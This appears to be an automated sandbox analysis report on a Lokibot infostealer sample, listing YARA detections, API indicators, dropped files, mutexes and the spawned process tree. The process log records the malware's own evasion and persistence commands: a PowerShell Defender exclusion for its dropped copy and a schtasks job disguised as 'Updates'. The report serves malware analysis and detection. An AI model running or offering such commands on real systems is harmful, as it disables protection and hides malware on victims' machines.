                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.gunzipped.exe.47f36e8.8.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0000000D.00000002.1741382852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: gunzipped.exe PID: 6640, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: mPvIOxEZXJsdYp.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: gunzipped.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mPvIOxEZXJsdYp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gunzipped.exe.3d49970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gunzipped.exe.76c0000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: _0020.AddAccessRule
Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, hn0STnT66964Vkc389.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: _0020.SetAccessControl
Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.a270000.12.raw.unpack, rTfa5bAroFj3akefBJ.cs | Security API names: _0020.AddAccessRule
Source: 0.2.gunzipped.exe.490fe90.6.raw.unpack, hn0STnT66964Vkc389.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.2fb41d0.4.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.gunzipped.exe.5870000.10.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.gunzipped.exe.2d9ef0c.3.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.gunzipped.exe.2d8eb6c.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/13@0/1
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Code function: 13_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, | 13_2_0040434D
Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
Source: C:\Users\user\Desktop\gunzipped.exe | Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Mutant created: \Sessions\1\BaseNamedObjects\lHNpfb
Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Local\Temp\tmp510D.tmp
Source: gunzipped.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gunzipped.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\gunzipped.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mPvIOxEZXJsdYp.exe.0.dr | Binary or memory string: UPDATE [AdventureWorksLT2008R2].[SalesLT].[Customer] SET FirstName = @firstName, LastName = @lastName, EmailAddress = @emailAddress, Title = @title, MiddleName = @middleName, Suffix = @suffix, CompanyName = @companyName, SalesPerson = @salesPerson, Phone = @phone, PasswordHash = @passwordHash, PasswordSalt = @passwordSalt, rowguid = @rowguid WHERE CustomerID = @CustomerID;SELECT * FROM [AdventureWorksLT2008R2].[SalesLT].[Customer] WHERE CustomerId = @CustomerID
Source: gunzipped.exe | Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\gunzipped.exe | File read: C:\Users\user\Desktop\gunzipped.exe
Source: unknown | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe | Process created: C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gunzipped.exe | Section loaded: vaultcli.dll
